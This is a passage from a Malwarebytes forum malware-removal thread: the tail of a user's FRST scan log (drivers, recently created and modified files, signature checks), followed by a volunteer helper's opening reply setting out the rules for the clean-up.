R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [33592 2017-03-11] (Dev47Apps)
R3 DroidCamVideo; C:\Windows\System32\DRIVERS\droidcamvideo.sys [229432 2017-03-11] (Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-12-12] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-12-12] (Disc Soft Ltd)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188352 2017-07-30] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [101784 2017-07-30] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-07-30] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [253856 2017-07-30] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-07-30] (Malwarebytes)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-06-28] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48064 2017-06-28] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57792 2017-06-28] (NVIDIA Corporation)
S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [3741960 2015-06-19] (Realtek Semiconductor Corporation                           )
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-08] (Razer, Inc.)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [114632 2015-09-16] (BigNox Corporation)
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-30 10:45 - 2017-07-30 10:45 - 00000358 _____ C:\Users\AMD\Desktop\Addition.txt
2017-07-30 10:43 - 2017-07-30 10:43 - 00000617 _____ C:\Users\AMD\Desktop\Mwb Blocked.txt
2017-07-30 10:40 - 2017-07-30 10:48 - 00022806 _____ C:\Users\AMD\Desktop\FRST.txt
2017-07-30 10:39 - 2017-07-30 10:40 - 00000000 ____D C:\FRST
2017-07-30 10:38 - 2017-07-30 10:38 - 00004806 _____ C:\Users\AMD\Desktop\AdwCleaner[C0].txt
2017-07-30 10:34 - 2017-07-30 10:34 - 02381312 _____ (Farbar) C:\Users\AMD\Desktop\FRST64.exe
2017-07-30 10:32 - 2017-07-30 10:35 - 00000000 ____D C:\AdwCleaner
2017-07-30 10:32 - 2017-07-30 10:32 - 08162248 _____ (Malwarebytes) C:\Users\AMD\Desktop\adwcleaner_7.0.0.0.exe
2017-07-30 09:36 - 2017-07-30 09:58 - 00000000 ____D C:\ComboFix
2017-07-30 09:36 - 2017-07-30 09:49 - 00000000 ____D C:\Windows\erdnt
2017-07-30 09:36 - 2017-07-30 09:36 - 00000000 ____D C:\Qoobox
2017-07-30 09:36 - 2011-06-26 13:45 - 00256000 _____ C:\Windows\PEV.exe
2017-07-30 09:36 - 2010-11-08 00:20 - 00208896 _____ C:\Windows\MBR.exe
2017-07-30 09:36 - 2009-04-20 11:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00098816 _____ C:\Windows\sed.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00080412 _____ C:\Windows\grep.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00068096 _____ C:\Windows\zip.exe
2017-07-30 09:31 - 2017-07-30 09:33 - 00212546 _____ C:\TDSSKiller.3.1.0.15_30.07.2017_09.31.12_log.txt
2017-07-30 09:15 - 2017-07-30 09:16 - 04922400 _____ (AO Kaspersky Lab) C:\Users\AMD\Desktop\tdsskiller.exe
2017-07-30 02:47 - 2017-07-30 10:37 - 00101784 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-07-30 02:47 - 2017-07-30 10:37 - 00084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-07-30 02:36 - 2017-07-30 09:51 - 00188352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-07-30 02:35 - 2017-07-30 10:37 - 00253856 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-07-30 02:35 - 2017-07-30 10:37 - 00045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\Program Files\Malwarebytes
2017-07-30 02:35 - 2017-06-27 12:06 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-07-30 02:34 - 2017-07-30 02:35 - 65033984 _____ (Malwarebytes ) C:\Users\AMD\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.160-1.0.2251.exe
2017-07-30 01:59 - 2017-07-30 01:59 - 00000000 ____D C:\Windows\Minidump
2017-07-30 01:36 - 2017-07-30 01:36 - 00000000 _____ C:\autoexec.bat
2017-07-30 01:26 - 2017-07-30 01:26 - 00000000 ____D C:\ProgramData\DataCache
2017-07-30 01:16 - 2017-07-30 01:23 - 00000000 ____D C:\ProgramData\Cache
2017-07-30 01:13 - 2017-07-30 01:13 - 00000000 ____D C:\Users\AMD\AppData\Local\yc
2017-07-30 01:11 - 2017-07-30 01:11 - 00000000 ____D C:\Windows\system32\tmp
2017-07-30 01:09 - 2017-07-30 02:23 - 00000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2017-07-30 01:08 - 2017-07-30 01:08 - 00000000 ____D C:\Users\Public\Documents\Tools
2017-07-30 01:08 - 2017-07-30 01:08 - 00000000 ____D C:\Users\Public\Documents\Baidu
2017-07-30 01:07 - 2017-07-30 01:07 - 00000552 _____ C:\Users\AMD\Downloads\heroes (1).torrent
2017-07-30 00:56 - 2017-07-30 00:56 - 00000572 _____ C:\Users\AMD\Downloads\heroes.torrent
2017-07-27 13:42 - 2017-07-27 13:42 - 00000000 ____D C:\VivoxLogs
2017-07-27 13:20 - 2017-07-27 00:55 - 03130440 _____ C:\Windows\SysWOW64\pbsvc_blr.exe
2017-07-26 14:44 - 2017-07-30 02:27 - 00000000 ____D C:\Users\AMD\AppData\Local\PunkBuster
2017-07-26 14:44 - 2017-07-27 15:44 - 00291512 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-07-26 14:43 - 2017-07-27 15:45 - 00076152 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2017-07-26 14:43 - 2017-07-27 15:44 - 00291512 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-07-26 14:43 - 2017-07-27 13:20 - 00189248 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-07-23 13:09 - 2017-07-30 10:45 - 00000000 ____D C:\Users\AMD\AppData\Local\CrashDumps
2017-07-23 12:57 - 2017-07-23 12:57 - 00000000 ____D C:\Users\AMD\AppData\Local\UnrealEngine
2017-07-23 12:57 - 2017-07-23 12:57 - 00000000 ____D C:\Users\AMD\AppData\Local\Citadel
2017-07-23 03:28 - 2017-07-23 03:28 - 00000222 _____ C:\Users\AMD\Desktop\Citadel Forged With Fire (Beta).url
2017-07-22 00:37 - 2017-07-22 00:37 - 00000000 ____D C:\Users\AMD\AppData\Local\Chromium
2017-07-22 00:36 - 2017-07-30 01:10 - 00000000 ____D C:\Users\AMD\AppData\Roaming\NVIDIA
2017-07-21 20:54 - 2017-07-21 20:54 - 00000936 _____ C:\Users\Public\Desktop\CPUID CPU-Z Gigabyte.lnk
2017-07-21 20:54 - 2017-07-21 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2017-07-21 20:54 - 2017-07-21 20:54 - 00000000 ____D C:\Program Files\CPUID
2017-07-21 20:45 - 2017-07-21 20:47 - 00000000 ____D C:\Users\AMD\AppData\Local\NVIDIA
2017-07-21 20:44 - 2017-07-24 21:36 - 00000000 ____D C:\Users\AMD\AppData\Local\NVIDIA Corporation
2017-07-21 20:41 - 2017-07-21 20:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-21 20:41 - 2017-07-21 20:41 - 00004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003852 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00001416 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-21 20:41 - 2017-06-28 05:38 - 01903040 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01755072 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01489344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01317312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 00121280 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2017-07-21 20:40 - 2017-07-21 20:40 - 00003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:40 - 2017-07-21 20:40 - 00003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:40 - 2017-07-21 20:40 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-21 20:40 - 2017-06-28 05:38 - 00001951 _____ C:\Windows\NvTelemetryContainerRecovery.bat
2017-07-21 20:40 - 2017-06-28 04:03 - 06462400 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 02478712 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 01762936 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00549312 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00392312 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00082040 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00069752 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-07-21 20:40 - 2017-06-28 03:27 - 00135616 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2017-07-21 20:40 - 2017-06-23 03:30 - 08076177 _____ C:\Windows\system32\nvcoproc.bin
2017-07-21 20:40 - 2017-03-11 04:17 - 00536864 _____ C:\Windows\system32\vulkan-1.dll
2017-07-21 20:40 - 2017-03-11 04:17 - 00525600 _____ C:\Windows\SysWOW64\vulkan-1.dll
2017-07-21 20:40 - 2017-03-11 04:17 - 00254240 _____ C:\Windows\system32\vulkaninfo.exe
2017-07-21 20:40 - 2017-03-11 04:17 - 00233760 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2017-07-21 20:39 - 2017-07-30 10:38 - 00000000 ____D C:\ProgramData\NVIDIA
2017-07-21 20:39 - 2017-07-21 20:46 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-21 20:39 - 2017-06-28 05:38 - 00001951 _____ C:\Windows\NvContainerRecovery.bat
2017-07-21 20:38 - 2017-06-28 05:38 - 40239736 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 35798136 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 35314296 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 28922488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 21432048 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 18726880 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 17806048 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 15437248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 14688096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 13559376 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 12337112 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 12132272 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 11501960 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 10381336 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 09982456 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 04186824 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03803256 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03691192 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03359168 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01988216 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6438476.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01615448 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01597888 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6438476.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01066616 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01004480 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00972736 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00924280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00689808 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00609728 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00578056 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00512672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00499320 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00491720 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00429920 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00407064 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00218712 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00179136 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00171384 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00154208 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00149224 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00146368 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00132072 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00057792 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvhci.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00048064 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00045976 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00044110 _____ C:\Windows\system32\nvinfo.pb
2017-07-21 20:38 - 2017-06-28 05:38 - 00000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2017-07-21 20:38 - 2017-06-28 05:38 - 00000669 _____ C:\Windows\system32\nv-vk64.json
2017-07-21 20:37 - 2017-07-21 20:41 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-21 20:37 - 2017-07-21 20:37 - 00000000 ____D C:\NVIDIA
2017-07-21 20:26 - 2017-07-21 20:26 - 00081309 _____ C:\Users\AMD\Documents\Untitled (3).wma
2017-07-21 20:26 - 2017-07-21 20:26 - 00058859 _____ C:\Users\AMD\Documents\Untitled (2).wma
2017-07-21 20:12 - 2017-07-21 20:09 - 00189112 _____ (Power Admin LLC) C:\Windows\PAExec.exe
2017-07-21 20:11 - 2017-07-30 09:29 - 00389272 _____ C:\Windows\ntbtlog.txt
2017-07-20 19:34 - 2017-07-20 19:34 - 00000724 _____ C:\Users\Public\Desktop\Secret World Legends.lnk
2017-07-20 19:34 - 2017-07-20 19:34 - 00000000 ____D C:\Users\AMD\AppData\Local\Funcom
2017-07-20 19:34 - 2017-07-20 19:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Funcom
2017-07-20 06:22 - 2017-07-23 11:54 - 00000000 ____D C:\Users\AMD\AppData\Local\Argo
2017-07-20 06:22 - 2017-07-20 06:24 - 00000000 ____D C:\Users\AMD\Documents\Argo
2017-07-20 06:22 - 2017-07-20 06:22 - 00000000 ____D C:\ProgramData\Bohemia Interactive
2017-07-12 15:33 - 2017-07-12 15:33 - 00000000 ____D C:\Users\AMD\AppData\Roaming\Python
2017-07-11 19:02 - 2017-07-11 19:02 - 00062482 _____ C:\Users\AMD\Downloads\SAVE_20170711_190106.jpeg
2017-07-10 10:56 - 2017-07-10 10:56 - 00013930 _____ C:\Users\AMD\Downloads\Form data Konsumen (PT.ELLANE ABADI PERKASA).xlsx
2017-07-04 17:34 - 2017-07-06 17:23 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-30 10:44 - 2009-07-14 11:45 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-07-30 10:44 - 2009-07-14 11:45 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-07-30 10:38 - 2017-05-04 16:13 - 00000000 ____D C:\Users\AMD\AppData\Local\MyComGames
2017-07-30 10:37 - 2016-11-02 10:55 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2017-07-30 10:36 - 2009-07-14 12:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-07-30 09:52 - 2009-07-14 09:34 - 00000215 _____ C:\Windows\system.ini
2017-07-30 09:50 - 2016-08-17 14:38 - 00000000 ____D C:\Users\AMD\AppData\Roaming\DMCache
2017-07-30 09:50 - 2009-07-14 09:34 - 65273856 _____ C:\Windows\system32\config\SOFTWARE.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 22544384 _____ C:\Windows\system32\config\SYSTEM.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\SECURITY.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\SAM.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\DEFAULT.bak
2017-07-30 09:42 - 2016-09-19 14:24 - 00000000 ____D C:\ProgramData\TEMP
2017-07-30 09:02 - 2016-08-04 14:36 - 00000000 ____D C:\Program Files (x86)\Steam
2017-07-30 02:28 - 2016-08-03 17:48 - 00000000 ____D C:\Users\AMD
2017-07-30 02:27 - 2016-08-04 20:12 - 00000000 ____D C:\Users\AMD\AppData\Roaming\BitTorrent
2017-07-30 02:27 - 2016-08-03 18:06 - 00000000 ____D C:\Users\AMD\AppData\Local\Mozilla
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\registration
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\inf
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\AppCompat
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Program Files\Labi Analysis
2017-07-30 02:19 - 2016-08-03 18:47 - 00000000 ____D C:\[Smad-Cage]
2017-07-27 13:24 - 2016-11-02 10:58 - 00000000 ____D C:\Users\AMD\Documents\My Games
2017-07-24 16:08 - 2016-08-15 21:14 - 00000000 ____D C:\Users\AMD\Documents\work office
2017-07-24 00:02 - 2017-06-21 22:20 - 00003509 _____ C:\Users\AMD\Desktop\ENEQ.txt
2017-07-23 11:48 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\system32\NDF
2017-07-22 22:30 - 2016-08-19 12:25 - 00000000 ____D C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-07-22 22:12 - 2016-08-17 14:38 - 00000000 ____D C:\Users\AMD\Downloads\Compressed
2017-07-21 20:49 - 2009-07-14 12:13 - 00781582 _____ C:\Windows\system32\PerfStringBackup.INI
2017-07-21 20:41 - 2017-04-05 00:54 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-21 20:40 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\Help
2017-07-21 20:15 - 2009-07-14 12:08 - 00032560 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-07-21 09:05 - 2016-09-04 15:45 - 00000000 ____D C:\XiaoMi
2017-07-20 06:21 - 2016-08-03 18:17 - 00000000 ____D C:\ProgramData\Package Cache
2017-07-12 15:33 - 2017-02-15 11:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mafia
2017-07-12 15:29 - 2016-09-16 19:06 - 00000000 ____D C:\Users\AMD\Documents\EHEM
2017-07-12 15:27 - 2016-08-17 21:58 - 00000000 ____D C:\Users\AMD\AppData\Local\Glyph
2017-07-12 03:01 - 2016-10-31 21:34 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-06 17:36 - 2016-08-03 18:47 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-07-06 14:56 - 2016-12-02 00:12 - 00000000 ____D C:\Users\AMD\AppData\LocalLow\Mozilla
2017-07-02 22:37 - 2017-04-25 16:32 - 00000000 ____D C:\Users\AMD\AppData\Roaming\discord
2017-07-02 22:02 - 2016-08-04 16:19 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-07-02 22:02 - 2016-08-04 16:19 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-03-11 14:33 - 2017-03-11 14:33 - 0000036 _____ () C:\ProgramData\droidcam-settings

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-07-23 04:15

==================== End of FRST.txt ============================

 

Can someone kindly explain to me ?

 

thanks b4

 

Link to post
Share on other sites
Aura

Aura

Posted
Posted

Hi Runez :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.

  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
